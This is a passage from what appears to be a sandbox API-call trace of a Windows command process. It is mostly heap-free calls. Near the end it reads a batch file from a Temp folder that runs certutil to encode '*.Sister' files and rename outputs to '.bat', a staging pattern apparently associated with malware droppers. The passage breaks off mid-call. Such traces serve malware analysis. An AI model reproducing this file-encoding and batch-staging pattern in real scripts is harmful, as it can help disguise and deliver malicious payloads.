RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9361560) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7420) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc72e0) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a710) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a6a0) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980990) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45380) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5e5f0) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0c80) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65e30) returned 1 [0289.174] GetProcessHeap () returned 0x21ed8c70000 [0289.174] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9351570) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8d50) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8b10) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a4e0) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a470) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45990) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed99807c0) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5f2a0) returned 1 [0289.219] GetProcessHeap () returned 0x21ed8c70000 [0289.219] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9351500) returned 1 [0289.220] GetProcessHeap () returned 0x21ed8c70000 [0289.220] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d458e0) returned 1 [0289.220] GetProcessHeap () returned 0x21ed8c70000 [0289.220] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9341510) returned 1 [0289.220] GetProcessHeap () returned 0x21ed8c70000 [0289.220] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8c10) returned 1 [0289.220] GetProcessHeap () returned 0x21ed8c70000 [0289.220] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc7290) returned 1 [0289.220] GetProcessHeap () returned 0x21ed8c70000 [0289.220] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a250) returned 1 [0289.220] GetProcessHeap () returned 0x21ed8c70000 [0289.220] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6a1e0) returned 1 [0289.221] GetProcessHeap () returned 0x21ed8c70000 [0289.221] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45850) returned 1 [0289.221] GetProcessHeap () returned 0x21ed8c70000 [0289.221] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed99805f0) returned 1 [0289.221] GetProcessHeap () returned 0x21ed8c70000 [0289.221] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5fd80) returned 1 [0289.221] GetProcessHeap () returned 0x21ed8c70000 [0289.221] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93414a0) returned 1 [0289.221] GetProcessHeap () returned 0x21ed8c70000 [0289.221] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c964c0) returned 1 [0289.221] GetProcessHeap () returned 0x21ed8c70000 [0289.221] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93314b0) returned 1 [0289.222] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c020) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ce80) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69f80) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69f10) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c79210) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980420) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5e420) returned 1 [0289.223] GetProcessHeap () returned 0x21ed8c70000 [0289.223] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9331440) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93795d0) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9321450) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8710) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69d80) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69d10) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c79180) returned 1 [0289.225] GetProcessHeap () returned 0x21ed8c70000 [0289.225] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980250) returned 1 [0289.226] GetProcessHeap () returned 0x21ed8c70000 [0289.226] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5f9e0) returned 1 [0289.226] GetProcessHeap () returned 0x21ed8c70000 [0289.226] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93213e0) returned 1 [0289.226] GetProcessHeap () returned 0x21ed8c70000 [0289.226] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c75930) returned 1 [0289.226] GetProcessHeap () returned 0x21ed8c70000 [0289.226] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93113f0) returned 1 [0289.228] GetProcessHeap () returned 0x21ed8c70000 [0289.228] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc86d0) returned 1 [0289.228] GetProcessHeap () returned 0x21ed8c70000 [0289.228] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bfd0) returned 1 [0289.228] GetProcessHeap () returned 0x21ed8c70000 [0289.228] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69b10) returned 1 [0289.229] GetProcessHeap () returned 0x21ed8c70000 [0289.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69aa0) returned 1 [0289.229] GetProcessHeap () returned 0x21ed8c70000 [0289.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c790f0) returned 1 [0289.229] GetProcessHeap () returned 0x21ed8c70000 [0289.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c78f20) returned 1 [0289.229] GetProcessHeap () returned 0x21ed8c70000 [0289.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5ed30) returned 1 [0289.229] GetProcessHeap () returned 0x21ed8c70000 [0289.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9311380) returned 1 [0289.231] GetProcessHeap () returned 0x21ed8c70000 [0289.231] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a0320) returned 1 [0289.231] GetProcessHeap () returned 0x21ed8c70000 [0289.231] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9301390) returned 1 [0289.231] GetProcessHeap () returned 0x21ed8c70000 [0289.231] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be90) returned 1 [0289.231] GetProcessHeap () returned 0x21ed8c70000 [0289.231] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cbe0) returned 1 [0289.231] GetProcessHeap () returned 0x21ed8c70000 [0289.231] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69820) returned 1 [0289.231] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d697b0) returned 1 [0289.232] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c78c40) returned 1 [0289.232] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d451b0) returned 1 [0289.232] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5e990) returned 1 [0289.232] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9301320) returned 1 [0289.232] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96d00) returned 1 [0289.232] GetProcessHeap () returned 0x21ed8c70000 [0289.232] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f1330) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bbc0) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bb20) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69570) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69500) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c78bb0) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980080) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5e7c0) returned 1 [0289.235] GetProcessHeap () returned 0x21ed8c70000 [0289.235] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92f12c0) returned 1 [0289.237] GetProcessHeap () returned 0x21ed8c70000 [0289.237] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d63a50) returned 1 [0289.237] GetProcessHeap () returned 0x21ed8c70000 [0289.237] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92e12d0) returned 1 [0289.237] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc89d0) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bb70) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d692f0) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69280) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c76660) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c789e0) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5f0d0) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92e1260) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d42a30) returned 1 [0289.238] GetProcessHeap () returned 0x21ed8c70000 [0289.238] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d1270) returned 1 [0289.241] GetProcessHeap () returned 0x21ed8c70000 [0289.241] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8810) returned 1 [0289.241] GetProcessHeap () returned 0x21ed8c70000 [0289.241] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ba80) returned 1 [0289.242] GetProcessHeap () returned 0x21ed8c70000 [0289.242] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d69060) returned 1 [0289.242] GetProcessHeap () returned 0x21ed8c70000 [0289.242] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68ff0) returned 1 [0289.242] GetProcessHeap () returned 0x21ed8c70000 [0289.242] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c765d0) returned 1 [0289.242] GetProcessHeap () returned 0x21ed8c70000 [0289.242] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c78d50) returned 1 [0289.242] GetProcessHeap () returned 0x21ed8c70000 [0289.242] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5f810) returned 1 [0289.242] GetProcessHeap () returned 0x21ed8c70000 [0289.242] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92d1200) returned 1 [0289.245] GetProcessHeap () returned 0x21ed8c70000 [0289.245] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96400) returned 1 [0289.245] GetProcessHeap () returned 0x21ed8c70000 [0289.245] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92c1210) returned 1 [0289.245] GetProcessHeap () returned 0x21ed8c70000 [0289.245] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ba30) returned 1 [0289.245] GetProcessHeap () returned 0x21ed8c70000 [0289.245] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be40) returned 1 [0289.279] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68db0) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68d40) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c76540) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c78810) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d60120) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92c11a0) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93791e0) returned 1 [0289.280] GetProcessHeap () returned 0x21ed8c70000 [0289.280] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b11b0) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45cb0) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8990) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68bc0) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68b50) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980ec0) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c76370) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5f640) returned 1 [0289.331] GetProcessHeap () returned 0x21ed8c70000 [0289.331] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92b1140) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93799c0) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a1150) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d70) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8c90) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d689b0) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68940) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980e30) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c761a0) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.334] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5ff50) returned 1 [0289.334] GetProcessHeap () returned 0x21ed8c70000 [0289.335] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a10e0) returned 1 [0289.335] GetProcessHeap () returned 0x21ed8c70000 [0289.335] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95e70) returned 1 [0289.335] GetProcessHeap () returned 0x21ed8c70000 [0289.335] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d19930) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8cc8d10) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bf80) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68720) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d686b0) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9980da0) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c75fd0) returned 1 [0289.338] GetProcessHeap () returned 0x21ed8c70000 [0289.338] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d5fbb0) returned 1 [0289.339] GetProcessHeap () returned 0x21ed8c70000 [0289.339] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed92a1070) returned 1 [0289.389] GetProcessHeap () returned 0x21ed8c70000 [0289.389] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c961c0) returned 1 [0289.389] GetProcessHeap () returned 0x21ed8c70000 [0289.389] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d09940) returned 1 [0289.389] GetProcessHeap () returned 0x21ed8c70000 [0289.389] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bcb0) returned 1 [0289.389] GetProcessHeap () returned 0x21ed8c70000 [0289.390] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d000) returned 1 [0289.390] GetProcessHeap () returned 0x21ed8c70000 [0289.390] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d68440) returned 1 [0289.478] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.478] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x182 [0289.478] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x37b, lpOverlapped=0x0) returned 1 [0289.478] SetFilePointer (in: hFile=0x98, lDistanceToMove=388, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x184 [0289.478] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0289.478] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.478] GetFileType (hFile=0x98) returned 0x1 [0289.479] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.479] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x184 [0289.479] GetProcessHeap () returned 0x21ed8c70000 [0289.479] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0289.480] GetProcessHeap () returned 0x21ed8c70000 [0289.480] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0289.480] _tell (_FileHandle=3) returned 388 [0289.480] _close (_FileHandle=3) returned 0 [0289.481] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0289.481] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0289.481] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.481] SetFilePointer (in: hFile=0x98, lDistanceToMove=388, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x184 [0289.481] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.481] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x184 [0289.522] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x379, lpOverlapped=0x0) returned 1 [0289.522] SetFilePointer (in: hFile=0x98, lDistanceToMove=417, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a1 [0289.522] MultiByteToWideChar (in: 